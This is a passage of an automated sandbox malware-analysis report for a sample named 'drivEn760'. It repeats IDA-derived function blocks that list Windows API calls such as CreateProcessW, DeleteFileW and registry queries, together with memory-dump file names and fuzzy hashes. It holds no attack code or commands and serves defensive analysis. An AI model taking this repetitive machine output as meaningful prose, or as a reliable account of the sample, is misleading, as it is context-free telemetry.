                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 334405425-0
                                                                                                            • Opcode ID: 49624561057d65463e648c025d3924b1173f5861ada87d1c47d5b8f7605275f5
                                                                                                            • Instruction ID: 1e7e134340f86907485d462c64894228b35b3344cd4f3d252167f9901203d809
                                                                                                            • Opcode Fuzzy Hash: 49624561057d65463e648c025d3924b1173f5861ada87d1c47d5b8f7605275f5
                                                                                                            • Instruction Fuzzy Hash: C521C231904104FADF11AFA5CF48A9D7A70BF48354F60413BF605B91E0DBBD8A929A5D
                                                                                                            APIs
                                                                                                            • GlobalFree.KERNEL32(006EAD70), ref: 00401C0B
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                                                                              • Part of subcall function 004066A5: lstrcatW.KERNEL32(Delete on reboot: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                              • Part of subcall function 004066A5: lstrlenW.KERNEL32(Delete on reboot: ,00000000,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,?,00405701,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000), ref: 004068A4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFreelstrcatlstrlen
                                                                                                            • String ID: "C:\Program Files\Everything\Everything.exe"
                                                                                                            • API String ID: 3292104215-3939621840
                                                                                                            • Opcode ID: 74372a43d300f5ce4d3921ebb73e0f6e2787d14c484b1a18c1f78a8614aab33d
                                                                                                            • Instruction ID: d74cddccbdd50a14e5bf5e3e63826a63b2a65df0fd836753f00777670cd3b466
                                                                                                            • Opcode Fuzzy Hash: 74372a43d300f5ce4d3921ebb73e0f6e2787d14c484b1a18c1f78a8614aab33d
                                                                                                            • Instruction Fuzzy Hash: 5321D872904210DBDB20EFA4DEC4E5E73A4AB047157150A3BF542F72D0D6BD9C518BAD
                                                                                                            APIs
                                                                                                              • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                                              • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                                                                            • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                                                                                                            • DeleteFileW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D4F
                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                            • String ID:
                                                                                                            • API String ID: 1655745494-0
                                                                                                            • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                                                                            • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                                                                                                            • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                                                                            • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                                                                                                            • GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B13
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSingleWait$CodeExitProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 2567322000-0
                                                                                                            • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                                                                            • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                                                                                                            • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                                                                            • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000408,?,00000000,004041FC), ref: 004045BB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID: x
                                                                                                            • API String ID: 3850602802-2363233923
                                                                                                            • Opcode ID: a4e2778218c9fdeab8ae4952123a6e605dd424a78c20075fb3486bdcc909a4f1
                                                                                                            • Instruction ID: 271d720e87c3080f9bc4c684b425461430c88a900e0fa794081ec75d4c8aeb56
                                                                                                            • Opcode Fuzzy Hash: a4e2778218c9fdeab8ae4952123a6e605dd424a78c20075fb3486bdcc909a4f1
                                                                                                            • Instruction Fuzzy Hash: 58C01271646200FBCB208B00EE00F067A21B7A4B02F2088B9FB81240B48A314822DB2D
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: 9659739b35da8af7fb285d31f71ea9b2402f124514f270f9d6eabe2ecb184dd4
                                                                                                            • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                                                                            • Opcode Fuzzy Hash: 9659739b35da8af7fb285d31f71ea9b2402f124514f270f9d6eabe2ecb184dd4
                                                                                                            • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,0040B5F8,00000000,00000011,00000002), ref: 004025FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3356406503-0
                                                                                                            • Opcode ID: 6a8ec2809d4675c6f0e16cb7776b62bce3f2a37e76b53da777b7f2e3d9c2fca9
                                                                                                            • Instruction ID: eaee0c709954dca67eb2d1c59e66f6ca2c08a593dad46a4828cc6951ae7b5872
                                                                                                            • Opcode Fuzzy Hash: 6a8ec2809d4675c6f0e16cb7776b62bce3f2a37e76b53da777b7f2e3d9c2fca9
                                                                                                            • Instruction Fuzzy Hash: 5C116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5D
                                                                                                            APIs
                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                                            • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                                                                            • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                                            • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 004057AD
                                                                                                              • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                                            • CoUninitialize.COMBASE(00000404,00000000,?,00000000,?), ref: 004057F9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeMessageSendUninitialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2896919175-0
                                                                                                            • Opcode ID: b14588aebbadd05bc97f1dd14ffe2b6982532d9bfcd69c4411fdff16e8679f7d
                                                                                                            • Instruction ID: 683c9d360a8619809caff371317e20043972a5eac84f98be19084c03997f3dfe
                                                                                                            • Opcode Fuzzy Hash: b14588aebbadd05bc97f1dd14ffe2b6982532d9bfcd69c4411fdff16e8679f7d
                                                                                                            • Instruction Fuzzy Hash: 84F09072600600CBD6215B54AD01B17B764EB84304F45447FFF89732F0DB7A48529A6E
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$EnableShow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1136574915-0
                                                                                                            • Opcode ID: d682e64da976263d74778dcd61bd470f9ad8341d2b96c4d867934af8fae03e48
                                                                                                            • Instruction ID: 74d914ea4967392a65d1c9fdd8f91c6329c2dde8704c14122971abf6b6e16597
                                                                                                            • Opcode Fuzzy Hash: d682e64da976263d74778dcd61bd470f9ad8341d2b96c4d867934af8fae03e48
                                                                                                            • Instruction Fuzzy Hash: 14E0D872908201CFE705EBA4EE485AD73F0EF40315710097FE401F11D0DBB54C00862D
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,00000000,00000000), ref: 00405C74
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405C81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 3712363035-0
                                                                                                            • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                                            • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                                                                            • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                                            • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                                              • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                                              • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                                                                              • Part of subcall function 004069C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A2B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
